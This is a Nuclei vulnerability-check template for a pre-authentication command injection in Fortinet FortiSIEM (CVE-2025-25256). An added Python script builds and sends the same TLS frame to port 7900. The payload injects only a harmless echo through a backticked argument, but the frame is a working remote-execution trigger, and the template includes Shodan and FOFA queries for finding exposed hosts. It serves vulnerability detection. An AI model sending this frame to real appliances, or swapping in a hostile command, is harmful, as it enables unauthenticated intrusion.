id: CVE-2025-25256

info:
  name: Fortinet FortiSIEM - OS Command Injection
  severity: critical
  author: watchtowr,darses
  description: |
    Fortinet FortiSIEM 6.7.9 < version <= 7.3.1 contains an OS command injection caused by improper neutralization of special elements in CLI requests, letting unauthenticated attackers execute unauthorized commands remotely.
  impact: |
    Unauthenticated attackers can execute arbitrary commands, potentially leading to full system compromise.
  remediation: |
    Update to the latest version beyond 7.3.1.
  classification:
    cve-id: CVE-2025-25256
    cwe-id: CWE-78
    cvss-metrics: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
    cvss-score: 9.8
    epss-percentile: 0.9735
    epss-score: 0.39021
    cpe: cpe:2.3:a:fortinet:fortisiem:*:*:*:*:*:*:*:*
  metadata:
    vendor: fortinet
    product: fortisiem
    shodan-query:
      - http.favicon.hash:-1341442175
      - http.html:"var hst = location.hostname"
    fofa-query:
      - icon_hash="-1341442175"
      - body="var hst = location.hostname"
  reference:
    - https://www.fortiguard.com/psirt/FG-IR-25-152
    - https://github.com/watchtowrlabs/watchTowr-vs-FortiSIEM-CVE-2025-25256
    - https://labs.watchtowr.com/should-security-solutions-be-secure-maybe-were-all-wrong-fortinet-fortisiem-pre-auth-command-injection-cve-2025-25256/
  tags: cve,cve2025,rce,network,tcp,fortinet,vkev,vuln

variables:
  # Block scalar keeps its trailing newline, so len(xml) is 34 (0x22).
  # The backticked `echo${IFS}/` is the injected command; it only expands to "/".
  xml: |
    nfs 127.0.0.1 `echo${IFS}/` local
  # 4-byte command id, 4-byte little-endian length (one byte from dec_to_hex plus
  # three literal zero bytes, so only valid while len(xml) < 256), 8 fixed bytes, body.
  payload: "\x5a\x00\x00\x00{{hex_decode(dec_to_hex(len(xml)))}}\x00\x00\x00\x6f\x42\x1e\x40\x00\x00\x00\x00{{xml}}"

tcp:
  - inputs:
      - data: "{{payload}}"
    host:
      - "tls://{{Hostname}}"
    port: 7900
    read-size: 1024

    matchers:
      - type: word
        part: raw
        words:
          - "\x01\x00\x00\x00"
# digest: 4a0a00473045022100be27a144311432bd6f50406c5fe8443f636ba91877f87c96ed9baba707ed03af02201b7aef1bd0c97a83d5c59008b15182b1454504a1bf991bfd77b0f5da49a72d42:922c64590222798bb761d5b6d8e72950
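The following Python is an added example, not part of the Nuclei template above and not watchTowr's PoC. It builds the same 16-byte frame the template's `payload` variable emits, parses it back, reproduces the template's `hex_decode(dec_to_hex(len(xml)))` length trick to show where it stops being a valid 4-byte field, and applies the template's `\x01\x00\x00\x00` matcher. The field names (command id, body length, fixed tail) are my reading of the template's byte layout, not documented phMonitor names; `probe()` assumes the same `tls://host:7900` endpoint and 1024-byte read the template uses, and the sample responses in the checks are constructed.

```python
"""Added example: frame builder/parser for the phMonitor probe above.

Not part of the Nuclei template or of watchTowr's PoC. Field names are
assumptions taken from the template's byte layout.
"""
import socket
import ssl
import struct

HEADER_FMT = "<II8s"                       # assumed: 4-byte command, 4-byte length, 8 fixed bytes
HEADER_LEN = struct.calcsize(HEADER_FMT)   # 16
CMD_FROM_TEMPLATE = 0x5A                   # "\x5a\x00\x00\x00" in the template, little-endian
FIXED_TAIL = b"\x6f\x42\x1e\x40\x00\x00\x00\x00"
SUCCESS_MARKER = b"\x01\x00\x00\x00"       # the template's `words` matcher

# The template's `xml` variable. The YAML block scalar (|) keeps a trailing
# newline, so len(xml) is 34 (0x22). `echo${IFS}/` is the injected command.
TEMPLATE_XML = "nfs 127.0.0.1 `echo${IFS}/` local\n"


def build_frame(body: str, cmd: int = CMD_FROM_TEMPLATE) -> bytes:
    """Header + body with a real 4-byte little-endian length (any body size)."""
    data = body.encode()
    return struct.pack(HEADER_FMT, cmd, len(data), FIXED_TAIL) + data


def template_length_bytes(body: str) -> bytes:
    """Mirror hex_decode(dec_to_hex(len(xml))) + three zero bytes from the template.

    Below 256 bytes dec_to_hex yields one byte and the zero padding completes a
    4-byte little-endian field. From 256 up the hex string grows, the field is
    no longer 4 bytes wide, and the frame is malformed.
    """
    hexlen = format(len(body.encode()), "x")
    if len(hexlen) % 2:                     # bytes.fromhex needs an even digit count
        hexlen = "0" + hexlen
    return bytes.fromhex(hexlen) + b"\x00\x00\x00"


def parse_frame(buf: bytes):
    """Split a frame into (cmd, tail, body); refuse short or truncated input."""
    if len(buf) < HEADER_LEN:
        raise ValueError("frame shorter than header")
    cmd, length, tail = struct.unpack(HEADER_FMT, buf[:HEADER_LEN])
    body = buf[HEADER_LEN:HEADER_LEN + length]
    if len(body) != length:
        raise ValueError("body truncated: header says %d, have %d" % (length, len(body)))
    return cmd, tail, body


def matches(response: bytes) -> bool:
    """The template's matcher: the raw reply contains a little-endian 1.

    Four such bytes occur in plenty of binary replies, so treat a hit as a
    candidate to confirm rather than proof of execution on its own.
    """
    return SUCCESS_MARKER in response


def probe(host: str, port: int = 7900, timeout: float = 10.0) -> bool:
    """Send the template's frame over TLS and apply its matcher.

    Only against systems you are authorised to test: on a vulnerable appliance
    this executes `echo${IFS}/`, exactly as the template does.
    """
    ctx = ssl.create_default_context()
    ctx.check_hostname = False             # appliances commonly present self-signed certs
    ctx.verify_mode = ssl.CERT_NONE
    with socket.create_connection((host, port), timeout=timeout) as raw:
        with ctx.wrap_socket(raw, server_hostname=host) as tls:
            tls.sendall(build_frame(TEMPLATE_XML))
            reply = tls.recv(1024)          # the template's read-size
    return matches(reply)


if __name__ == "__main__":
    import sys
    print(build_frame(TEMPLATE_XML)[:HEADER_LEN].hex(" "))
    if len(sys.argv) > 1:
        print("candidate match" if probe(sys.argv[1]) else "no match")
```

Run it with no arguments to print the header bytes the template sends (the length byte is `22`), or with a hostname to perform the same TLS exchange the template does. `build_frame` uses `struct.pack("<I", ...)` for the length, which is the generalisation of the template's one-byte-plus-padding construction; `template_length_bytes` exists only to show that the two agree for this 34-byte body and diverge for bodies of 256 bytes or more.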